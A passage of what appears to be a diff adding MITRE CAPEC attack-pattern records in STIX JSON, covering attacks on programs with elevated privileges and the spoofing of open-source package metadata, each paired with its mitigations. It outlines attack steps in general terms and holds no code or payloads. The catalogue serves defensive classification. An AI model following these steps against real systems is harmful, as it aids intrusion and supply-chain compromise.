Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Target Programs with Elevated Privileges", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "attack-pattern--4cd18074-15c1-4206-8391-115685669623" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find programs with elevated priveleges: The adversary probes for programs running with elevated privileges.

    2. Techniques
    Look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break.

  2. Find vulnerability in running program: The adversary looks for a vulnerability in the running program that would allow for arbitrary code execution with the privilege of the running program.

    3. Techniques
    Look for improper input validation
    Look for improper failure safety. For instance when a program fails it may authorize restricted access to anyone.
    Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.

Exploit

  1. Execute arbitrary code: The adversary exploits the vulnerability that they have found. For instance, they can try to inject and execute arbitrary code or write to OS resources.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The targeted program runs with elevated OS privileges.", + "The targeted program accepts input data from the user or from another program.", + "The targeted program is giving away information about itself. Before performing such attack, an eventual attacker may need to gather information about the services running on the host target. The more the host target is verbose about the services that are running (version number of application, etc.) the more information can be gather by an attacker.", + "This attack often requires communicating with the host target services directly. For instance Telnet may be enough to communicate with the host target." + ], + "x_capec_skills_required": { + "Low": "An attacker can use a tool to scan and automatically launch an attack against known issues. A tool can also repeat a sequence of instructions and try to brute force the service on the host target, an example of that would be the flooding technique.", + "Medium": "More advanced attack may require knowledge of the protocol spoken by the host service." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the principle of least privilege.", + "id": "course-of-action--c87108ec-86d6-4db1-b9a6-9d165534dfbb", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4ac5e039-5b39-4762-baa6-db1436c0c113", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c87108ec-86d6-4db1-b9a6-9d165534dfbb", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate all untrusted data.", + "id": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b71f57d-057f-4ba8-90a3-b82441f7ad5f", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the latest patches.", + "id": "course-of-action--82e53757-6195-45a8-87d8-b8a3471be28d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c3677a7-f6ef-4f6a-98f2-23a940c9d065", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82e53757-6195-45a8-87d8-b8a3471be28d", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. Only expose the services which are needed and have security mechanisms such as authentication built around them.", + "id": "course-of-action--7b2b2f5e-63ea-4e66-b1db-20c8cfb846bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3852cd85-fee0-458c-aa19-1ee065916045", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b2b2f5e-63ea-4e66-b1db-20c8cfb846bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid revealing information about your system (e.g., version of the program) to anonymous users.", + "id": "course-of-action--2e81b94f-576a-4a5d-8535-19447cf00938", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f38ce3b-57b6-40fc-8b8c-08befcded00e", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e81b94f-576a-4a5d-8535-19447cf00938", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs.", + "id": "course-of-action--c88ccddb-e8a1-4fd2-91df-be5dfb7cd1b3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b4e5f04-ebe0-4a77-b851-5826990a4dda", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c88ccddb-e8a1-4fd2-91df-be5dfb7cd1b3", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible use a sandbox model which limits the actions that programs can take. A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage.", + "id": "course-of-action--7031e154-89f3-4994-8c96-386138825551", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f29e28aa-4464-4272-a547-4585c2e99452", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7031e154-89f3-4994-8c96-386138825551", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Check your program for buffer overflow and format String vulnerabilities which can lead to execution of malicious code.", + "id": "course-of-action--d97a8953-bfba-4b9a-ab46-36c6b343b91a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5813c2bd-b132-4bc7-ae4d-5c4b492c361e", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d97a8953-bfba-4b9a-ab46-36c6b343b91a", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor traffic and resource usage and pay attention if resource exhaustion occurs.", + "id": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d245d4d1-c52c-41ba-aae5-782470e499d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect your log file from unauthorized modification and log forging.", + "id": "course-of-action--94ece0ea-fea4-4009-86a0-589e49a5a8aa", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66ca67c0-4eaa-438c-ba7f-8bbdd79867b4", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94ece0ea-fea4-4009-86a0-589e49a5a8aa", + "spec_version": "2.1", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the metadata of a resource (e.g., file, directory, repository, etc.) to present a malicious resource as legitimate/credible.\n ", + "external_references": [ + { + "external_id": "CAPEC-690", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/690.html" + } + ], + "id": "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Metadata Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_extended_description": "\n One approach to this attack entails the adversary altering a maliciously modified resource's metadata in order to hide their malicious activity. Another approach involves altering the metadata of an adversary-created resource to make the source appear more credible. Adversaries may spoof a variety of metadata across a number of resources, such as the following:\n \n Authors of Version Control System (VCS) repository commits\n Open source package statistics\n File attributes, such as when a file was last update\n \n The ultimate goal of a Metadata Spoofing attack is to trick victims into believing the malicious resource being provided originates from a reputable source. However, the victim instead leverages the malicious resource, which could result in a number of negative technical impacts.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_prerequisites": [ + "Identification of a resource whose metadata is to be spoofed" + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of metadata to convince victims the source is trusted" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate metadata of resources such as authors, timestamps, and statistics.", + "id": "course-of-action--bbb351b8-c841-43ed-a1b2-3c013423cbcb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f67d5c08-1228-4dda-ac82-d25218087376", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbb351b8-c841-43ed-a1b2-3c013423cbcb", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Confirm the pedigree of open source packages and ensure the code being downloaded does not originate from another source.", + "id": "course-of-action--2c911ba7-6886-495c-ad24-be76d469d0c4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6aa6808-e8fd-4132-89a5-cfeb7dde7a23", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2c911ba7-6886-495c-ad24-be76d469d0c4", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Even if the metadata is properly checked and a user believes it to be legitimate, there may still be a chance that they've been duped. Therefore, leverage automated testing techniques to determine where malicious areas of the code may exist.", + "id": "course-of-action--159fff7f-a612-4bd7-8053-34885f345613", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4cffa7b9-c3ff-4c3b-8de3-0d69142f8f2d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--159fff7f-a612-4bd7-8053-34885f345613", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs open-source software metadata in an attempt to masquerade malicious software as popular, maintained, and trusted.\n ", + "external_references": [ + { + "external_id": "CAPEC-691", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/691.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + } + ], + "id": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Spoof Open-Source Software Metadata", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1", + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_child_of_refs": [ + "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary provides a malicious open-source library, claiming to provide extended logging features and functionality, and spoofs the metadata with that of a widely used legitimate library. The adversary then tricks victims into including this library in their underlying application. Once the malicious software is incorporated into the application, the adversary is able to manipulate and exfiltrate log data." + ], + "x_capec_extended_description": "\n Due to open-source software's popularity, it serves as a desirable attack-vector for adversaries since a single malicious component may result in the exploitation of numerous systems/applications. Adversaries may, therefore, spoof the metadata pertaining to the open-source software in order to trick victims into downloading and using their malicious software. Examples of metadata that may be spoofed include:\n \n Owner of the software (e.g., repository or package owner)\n Author(s) of repository commits\n Frequency of repository commits\n Date/Time of repository commits\n Package or Repository \"stars\"\n \n Once the malicious software component has been integrated into an underlying application or executed on a system, the adversary is ultimately able to achieve numerous negative technical impacts within the system/application. This often occurs without any indication of compromise.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf" + ], + "x_capec_prerequisites": [ + "Identification of a popular open-source component whose metadata is to be spoofed." + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of software metadata to convince victims the source is trusted." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before downloading open-source software, perform precursory metadata checks to determine the author(s), frequency of updates, when the software was last updated, and if the software is widely leveraged.", + "id": "course-of-action--5c736e80-28c8-4d55-b991-897bf3b192ba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8cb9302a-26a3-4414-a0ec-5beaa7877ac3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c736e80-28c8-4d55-b991-897bf3b192ba", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Within package managers, look for conflicting or non-unique repository references to determine if multiple packages share the same repository reference.", + "id": "course-of-action--589123af-2f4a-4981-88a6-c053df0854f2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4ea5d12b-fcc4-4245-9eee-ca5832c2631e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--589123af-2f4a-4981-88a6-c053df0854f2", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Reference vulnerability databases to determine if the software contains known vulnerabilities.", + "id": "course-of-action--a204dbb2-3715-4055-8ac3-8f999c400a40", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02e2a97b-b5be-463c-a796-c06ed1b69855", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a204dbb2-3715-4055-8ac3-8f999c400a40", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source software from reputable hosting sites or package managers.", + "id": "course-of-action--c80df8f5-a98b-488d-8935-509df5316146", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cf190319-afbe-49c3-8922-661ce1ebab46", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c80df8f5-a98b-488d-8935-509df5316146", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source software that has been adequately signed by the developer(s). For repository commits/tags, look for the \"Verified\" status and for developers leveraging \"Vigilant Mode\" (GitHub) or similar modes.", + "id": "course-of-action--6766b25b-c346-4b4b-8542-35002e050f31", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae0bcd4e-8042-4166-a1e4-99ebd23a97fa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6766b25b-c346-4b4b-8542-35002e050f31", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "After downloading open-source software, ensure integrity values have not changed.", + "id": "course-of-action--760cd567-fe77-43b8-bd40-b612331562da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 